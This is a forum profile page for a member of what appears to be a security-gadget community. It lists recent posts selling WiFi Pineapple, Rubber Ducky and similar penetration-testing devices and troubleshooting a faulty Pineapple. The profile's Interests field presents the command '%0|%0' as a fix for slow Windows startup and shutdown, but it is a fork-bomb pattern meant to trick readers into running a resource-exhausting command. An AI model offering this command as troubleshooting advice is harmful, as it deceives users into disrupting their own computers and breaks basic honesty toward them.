Jump to content

tim657657

Active Members
  • Posts

    28
  • Joined

  • Last visited

Profile Information

  • Interests
    If you Haave Windows Pc and having problems with start up and or shutdown taking forever do this.

    Press Ctrl + R  which will open a run command window .

    type Cmd  which will open A Command Prompt . If asked for Admin password by UAC press okay

    In the black window enter or copy paste this   %0|%0

Recent Profile Visitors

1,197 profile views

tim657657's Achievements

  1. I have wifi mark 7 , shark jack , rubber ducky never used ,plunder bug. SOme one make me an offer only had this stuff 3 months. all excellent condition. contact me.
  2. i have several things for sale
  3. I have wifi mark 7 , shark jack , rubber ducky never used ,plunder bug. SOme one make me an offer only had this stuff 3 months. all excellent condition. contact me.
  4. Yeah cause wouldn't want know one knowing the issues that are considering buying one. Wouldn't recommend if you want one buy an old mark 5 or 6
  5. they didnt send me sh!t lol. wtf are you talking about?
  6. cause its Darren lol he keeps good stuff for him self . 🤣
  7. me too its nsa we are prob on a list
  8. over 21 ap's and i can only ever get 2 or 1 client s. to connect including my own network and yes the filters are configured correctly.
  9. IM NOT DOING ANYTHING ILLEGAL IF THAT WHAT YOU MEAN sorry caps but yeah im testing for real world and like i said client devices even when there mac is sniped and forced just doesnt work . in PA when its enabled and you can change out the mac and put the devices mac then FF:FF:FF:FF:FF that doesnt even work with the combnation of both i would think that would force the one client to connect and still nadda.
  10. I have been running my new tetra all day btw this is my second one the first one they sent me just randomly stopped working so now im wondering if this one has an issue?Has anyone else been having problems with clients connecting .And yes I have tried many different configurations with ssid and mac id in filter disabled ,enabled while allowing AP to run ssid pool i mean I cant get not one client to connect to this thing i dont know maybe im doing something wrong but Im not a total noob at this I had a MARK 5 and it was awesome I can write some Script so I mean I really thing I have another dud pineapple . Maybe if someone can tell me how they have there filters set up to receive the most amount of clients . Hope someone can shine a lite on what im doing wrong.Or if this pine apple is also f up like the first bricked one i still have it btw its like they new it was a prob on there end cause they rushed me another one with out even having me send the bricked one back???? okay well i will be waiting for some clarification.
  11. i sent in the ticket and they are telling me they need more info WTF?! I told them it wont boot and solid yellow led what the helll im going to put up with bullshit i will open a class action law suit.
×
×
  • Create New...